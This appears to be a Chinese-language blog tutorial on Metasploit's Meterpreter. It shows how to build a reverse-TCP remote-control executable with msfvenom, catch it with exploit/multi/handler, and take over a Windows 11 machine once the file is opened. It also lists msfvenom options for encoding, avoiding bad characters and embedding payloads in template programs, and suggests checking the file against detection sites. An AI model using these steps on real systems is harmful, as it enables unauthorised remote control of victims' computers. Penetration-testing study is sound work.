一、Meterprete
Meterpreter是Metasploit Framework中的关键组件,它作为漏洞利用后的攻击载荷,提供纯内存工作模式,无需磁盘写入,且支持加密通信。Meterpreter允许进行进程迁移、密码哈希获取、权限提升等高级渗透测试操作。基本命令如进程迁移、系统信息收集和文件操作。
二、恶意远控软件生成
工具:kali(攻击者),windows11(被攻击者)
1
| msfvenom -p 被攻击计算机系统(windows或者linux)/处理器体系结构(x64或者x32)/meterpreter/reverse_tcp lhost=攻击者的ip lport=设置端口号 -f exe -o 软件存放路径
|
以上参数介绍
1 2 3 4 5 6 7 8 9
| -p, --payload < payload> 指定需要使用的payload(攻击荷载)。可以使用自定义payload,几乎支持全平台的
-f, --format < format> 指定输出格式
-o, --out < path> 指定创建好的payload的存放位置
lhost, location host 本地ip
lport, location port 本地端口
|

三、检测恶意软件
将生成软件放到检测网站检测测

四、远控步骤
1.kali中打开控制端
2.利用Meterpreter中的模块exploit/mutil/handler
1
| use exploit/multi/handler
|
3.设置相关配置(荷载,ip,端口等)

4.在windows11中打开恶意软件
这里目录中存在main文件夹,里面我采访了一些内容,方便稍后测试

5.返回kali中看到命令行出现变化,进行操作


入侵成功!
五、Msfvenom相关参数
--list 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops,......all1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32
| -p, --payload < payload> 指定需要使用的payload(攻击荷载)。也可以使用自定义payload,几乎是支持全平台的 -f, --format < format> 指定输出格式 -e, --encoder <encoder> 指定需要使用的encoder(编码器),指定需要使用的编码,如果既没用-e选项也没用-b选项,则输出raw payload -a, --arch < architecture> 指定payload的目标架构,例如x86 还是 x64 还是 x86_64 -o, --out < path> 指定创建好的payload的存放位置 -b, --bad-chars < list> 设定规避字符集,指定需要过滤的坏字符。例如:不使用 '\x0f'、'\x00' -n, --nopsled < length> 为payload预先指定一个NOP滑动长度 -s, --space < length> 设定有效攻击荷载的最大长度,就是文件大小 -i, --iterations < count> 指定payload的编码次数 -c, --add-code < path> 指定一个附加的win32 shellcode文件 -x, --template < path> 指定一个自定义的可执行文件作为模板,并将payload嵌入其中 -k, --keep 保护模板程序的动作,注入的payload作为一个新的进程运行 -v, --var-name < value> 指定一个自定义的变量,以确定输出格式 -t, --timeout <second> 从stdin读取有效负载时等待的秒数(默认为30,0表示禁用) -h,--help 查看帮助选项 --platform < platform> 指定payload的目标平台
|